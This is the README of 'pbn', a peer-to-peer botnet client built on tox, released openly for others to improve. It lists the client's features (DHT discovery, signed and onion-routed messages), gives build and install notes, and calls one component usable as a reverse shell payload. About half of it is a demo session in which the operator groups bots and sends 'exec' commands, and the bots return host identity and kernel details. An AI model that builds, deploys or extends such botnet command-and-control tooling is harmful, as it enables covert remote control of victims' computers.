./pbn .o8
oo.ooooo. 888oooo. ooo. .oo.
888' `88b d88' `88b `888P"Y88b
888 888 888 888 888 888
888 888 888 888 888 888
888bod8P' `Y8bod8P' o888o o888o
o888o P E E R 2 P E E R
pbn is a fully distributed peer to peer botnet client written in C using tox as a base for communications.
pbn features include DHT peer discovery, keypair message signature verification, onion message passing, and fully encrypted communication.
pbn was written as a proof of concept for a botnet with no points of failure during a night of heavy drinking at defcon a few years ago.
Yes pbn works. No pbn is not battle tested. Yes pbn probably has bugs.
In order to build you will need libsodum and c-toxcore.
I have not worked on this for like 2 years and I felt it was time to open it up for other people to take a look at and improve.
There is/was a python controller and a c controller, I don't know exactly what is working and what is not working, I am starting off by releasing the client and I will see where to go from there.
Expect more documentation and examples and shit like that eventually.
When I wrote this i was pretty intoxicated, and did not document anything. Good luck on that. Also, c-toxcore was not documented at all and I just read the implementation to write this. Shit is probably wrong in many places, or changed since I last wrote it. I just built it against toktok/c-toxcore and it worked, but idk if conferences ever got implemented which was something I was looking at, and idk where i left group messages. Needs work, gl, hf.
IDK the status of pytox, which was used when writing owner.py. I am including it as a reference for myself or others looking to build a new botnet controller interface.
cli.c is an unauthenticated botnet client. Don't use it.
I forget what i was doing with slim.c maybe it does the group stuff. IDK i will look at it in a bit.
pytox works if u do
pip3 install --user 'https://github.com/TokTok/py-toxcore-c/archive/v0.2.0.tar.gz'
added the half static makefile, builds on my osx but u probbaly need to modify it for linux. ill add the line that worked on my old linux box as a comment.
the binary is only 422kb on my mac built half static btw
I need to make a proper p2pshell listener for cli.c, i was thinking about it and tbh its fine to just use as something like a reverse shell payload if i had a proper listener for it. tbd
Groups are working. Yep. example session using minitox below.
$ ./minitox
Type `/guide` to print the guide.
Type `/help` to print command list.
* Waiting to be online ...
* You are Online(UDP)
* receive friend request(use `/accept` to see).
> /accept 1
> /accept
* (null) is Online(UDP)
> /contacts
#Friends(conctact_index|name|connection|status message):
2 Echo Bot Online(UDP) Echoing your messages
0 Echo Bot Offline Echoing your messages
#Groups(contact_index|count of peers|name):
> /invite 2
> /contacts
#Friends(conctact_index|name|connection|status message):
2 Echo Bot Online(UDP) Echoing your messages
0 Echo Bot Offline Echoing your messages
#Groups(contact_index|count of peers|name):
3 2 (null)
> /go 3
05:59:37 | exec id
05:59:37 Echo Bot | uid=501(kod) gid=20(staff) groups=20(staff),501(access_bpf),401(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),333(piavpn),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)
05:59:52 | uname -a
06:00:07 | exec uname -a
06:00:07 Echo Bot | Darwin m.local 18.7.0 Darwin Kernel Version 18.7.0: Mon Apr 27 20:09:39 PDT 2020; root:xnu-4903.278.35~1/RELEASE_X86_64 x86_64
* receive friend request(use `/accept` to see).
> /accept
1 FRIEND hi lmao
> /accept 1
* (null) is Online(UDP)
> /contacts
#Friends(conctact_index|name|connection|status message):
4 Echo Bot Online(UDP) Echoing your messages
2 Echo Bot Online(UDP) Echoing your messages
0 Echo Bot Offline Echoing your messages
#Groups(contact_index|count of peers|name):
3 2 (null)
> /invite 4 3
> /contacts
#Friends(conctact_index|name|connection|status message):
4 Echo Bot Online(UDP) Echoing your messages
2 Echo Bot Online(UDP) Echoing your messages
0 Echo Bot Offline Echoing your messages
#Groups(contact_index|count of peers|name):
3 3 (null)
06:01:45 | exec uname -a
06:01:45 Echo Bot | Darwin m.local 18.7.0 Darwin Kernel Version 18.7.0: Mon Apr 27 20:09:39 PDT 2020; root:xnu-4903.278.35~1/RELEASE_X86_64 x86_64
06:01:45 Echo Bot | Darwin m.local 18.7.0 Darwin Kernel Version 18.7.0: Mon Apr 27 20:09:39 PDT 2020; root:xnu-4903.278.35~1/RELEASE_X86_64 x86_64
(null) <<<